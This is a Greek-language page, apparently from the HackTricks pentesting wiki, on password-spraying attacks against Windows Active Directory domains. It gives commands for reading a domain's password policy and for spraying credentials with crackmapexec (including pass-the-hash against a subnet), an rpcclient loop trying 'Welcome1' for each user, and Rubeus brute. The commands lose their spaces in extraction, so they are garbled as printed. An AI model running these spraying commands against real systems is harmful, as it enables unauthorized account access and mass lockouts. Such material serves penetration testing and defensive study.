Μοιραστείτε τα χάκινγκ κόλπα σας υποβάλλοντας PRs σταHackTricks και HackTricks Cloud αποθετήρια του github.
Επίθεση με Κατανομή Κωδικών Πρόσβασης
Αφού βρείτε αρκετά έγκυρα ονόματα χρηστών μπορείτε να δοκιμάσετε τους πιο συνηθισμένους κωδικούς πρόσβασης (λαμβάνοντας υπόψη την πολιτική κωδικού πρόσβασης του περιβάλλοντος) με κάθε έναν από τους ανακαλυφθέντες χρήστες.
Από προεπιλογή, το ελάχιστο μήκος του κωδικού πρόσβασης είναι 7.
Προσέξτε ότι μπορείτε να κλειδώσετε ορισμένους λογαριασμούς εάν δοκιμάσετε πολλούς λανθασμένους κωδικούς πρόσβασης (προεπιλογή περισσότερο από 10).
Λήψη πολιτικής κωδικού πρόσβασης
Εάν έχετε κάποια διαπιστευτήρια χρήστη ή ένα κέλυφος ως χρήστης του τομέα μπορείτε να λάβετε την πολιτική κωδικού πρόσβασης με:
# From Linuxcrackmapexec<IP>-u'user'-p'password'--pass-polenum4linux-u'username'-p'password'-P<IP>rpcclient-U""-N10.10.10.10;rpcclient $>querydominfoldapsearch-h10.10.10.10-x-b"DC=DOMAIN_NAME,DC=LOCAL"-ssub"*"|grep-m1-B10pwdHistoryLength# From Windowsnetaccounts(Get-DomainPolicy)."SystemAccess"#From powerview
Εκμετάλλευση από Linux (ή όλα)
Χρησιμοποιώντας το crackmapexec:
crackmapexecsmb<IP>-uusers.txt-ppasswords.txt# Local Auth Spray (once you found some local admin pass or hash)## --local-auth flag indicate to only try 1 time per machinecrackmapexecsmb--local-auth10.10.10.10/23-uadministrator-H10298e182387f9cab376ecd08491764a0|grep+
Με το εργαλείο scanner/smb/smb_login του Metasploit:
Χρησιμοποιώντας το rpcclient:
# https://www.blackhillsinfosec.com/password-spraying-other-fun-with-rpcclient/for u in$(catusers.txt); dorpcclient-U"$u%Welcome1"-c"getusername;quit"10.10.10.10|grepAuthority;done
# with a list of users.\Rubeus.exe brute/users:<users_file>/passwords:<passwords_file>/domain:<domain_name>/outfile:<output_file># check passwords for all users in current domain.\Rubeus.exe brute/passwords:<passwords_file>/outfile:<output_file>
Με το Invoke-DomainPasswordSpray (Μπορεί να δημιουργήσει χρήστες από τον τομέα από προεπιλογή και θα λάβει την πολιτική κωδικού πρόσβασης από τον τομέα και θα περιορίσει τις προσπάθειες ανάλογα με αυτήν):
Για να χρησιμοποιήσετε οποιοδήποτε από αυτά τα εργαλεία, χρειάζεστε μια λίστα χρηστών και έναν κωδικό πρόσβασης / μια μικρή λίστα κωδικών πρόσβασης για να κάνετε spraying.